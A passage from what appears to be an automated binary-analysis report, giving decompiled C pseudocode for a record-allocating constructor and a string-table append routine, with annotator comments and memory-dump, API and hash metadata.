					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 8)) = _t22;                 // this+8 = record 2
				L00412090();                                     // allocate record 3
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 0xc)) = _t22;               // this+0xc = record 3
				L00412090();                                     // allocate record 4
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				 *((intOrPtr*)(_t31 + 0x10)) = _t22;              // this+0x10 = record 4
				return _t31;                                     // returns the object, as a constructor would
			}
                                                                                                                                                                  0x004086a9
                                                                                                                                                                  0x004086ac
                                                                                                                                                                  0x004086ac
                                                                                                                                                                  0x004086b3
                                                                                                                                                                  0x004086b5
                                                                                                                                                                  0x004086b8
                                                                                                                                                                  0x004086c0
                                                                                                                                                                  0x004086d2
                                                                                                                                                                  0x004086c2
                                                                                                                                                                  0x004086c2
                                                                                                                                                                  0x004086c5
                                                                                                                                                                  0x004086c7
                                                                                                                                                                  0x004086ca
                                                                                                                                                                  0x004086cd
                                                                                                                                                                  0x004086cd
                                                                                                                                                                  0x004086d5
                                                                                                                                                                  0x004086db

APIs
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
• Opcode ID: 57e6dba8ab03ca08e411dffe9121cf345b91e8e4000f6b536eec088db062ac75
• Instruction ID: a93534bcf4590af08eae181cf0f7bc47295f2e33990000f3cf4a50e67893865e
• Opcode Fuzzy Hash: 57e6dba8ab03ca08e411dffe9121cf345b91e8e4000f6b536eec088db062ac75
• Instruction Fuzzy Hash: 8421E7B0A003008ED7519F2A9645A55FBE4FF9431072AC9AFD259CB3B2DBF9C880DB14
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00406AA3(void* __eax, void* __ecx, char* _a4) {
				int _v8;
				void* __edi;
				int _t25;
				int _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t52;
				intOrPtr _t53;
				void** _t55;
				void** _t56;
				void* _t59;

				/* Decompiled string-table append: the object in __eax apparently keeps a
				   character buffer at +0x10 (used length +0x04, capacity +0x14) and an
				   array of string offsets at +0x0c (entry count +0x1c, capacity +0x18). */
				_t59 = __eax;
				_t27 = strlen(_a4);
				_t42 =  *((intOrPtr*)(_t59 + 4));      // current length = offset where the new string goes
				_t52 = _t42 + _t27 + 1;                 // new length including the terminating NUL
				_v8 = _t27;
				_t28 =  *((intOrPtr*)(_t59 + 0x14));
				 *((intOrPtr*)(_t59 + 4)) = _t52;
				_t55 = _t59 + 0x10;
				if(_t52 != 0xffffffff) {
					E00406104(_t59, _t52, _t55, 1, _t28);     // grow the character buffer (element size 1)
				} else {
					free( *_t55);                             // length overflowed: drop the buffer
				}
				_t53 =  *(_t59 + 0x1c);
				_t31 =  *((intOrPtr*)(_t59 + 0x18));
				_t56 = _t59 + 0xc;
				if( *(_t59 + 0x1c) != 0xffffffff) {
					E00406104(_t59 + 8, _t53, _t56, 4, _t31); // grow the offset array (element size 4)
				} else {
					free( *_t56);
				}
				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);                // copy the string in place
				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;            // NUL-terminate it
				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;    // record its offset
				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
				_t25 =  *(_t59 + 0x1c) - 1; // -1
				return _t25;                                              // index of the new entry
			}
APIs
• strlen.MSVCRT ref: 00406AAF
• free.MSVCRT(?,00000001,?,00000000,?,?,00406F39,?,00000000,?,?), ref: 00406ACF
  • Part of subcall function 00406104: malloc.MSVCRT ref: 00406120
  • Part of subcall function 00406104: memcpy.MSVCRT ref: 00406138
  • Part of subcall function 00406104: free.MSVCRT(00000000,00000000,76D24DE0,00406B78,00000001,?,00000000,76D24DE0,00406EF2,00000000,?,?), ref: 00406141
• free.MSVCRT(?,00000001,?,00000000,?,?,00406F39,?,00000000,?,?), ref: 00406AF2
• memcpy.MSVCRT ref: 00406B12
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
• API String ID: 3669619086-0
• Opcode ID: fe556f8fd747337398a4671f90261db5b892e00cab488469f465dd59fda81595
• Instruction ID: b9d8f5a2f56f362531d37561c783707772d91941aea6ec8fb4057fc73eb697f3
• Opcode Fuzzy Hash: fe556f8fd747337398a4671f90261db5b892e00cab488469f465dd59fda81595
• Instruction Fuzzy Hash: A7119D72200600EFD730EF18D88199AB7F5EF48324B108A2EF556A7692C7B5FD25CB54
Uniqueness
• Uniqueness Score: -1.00%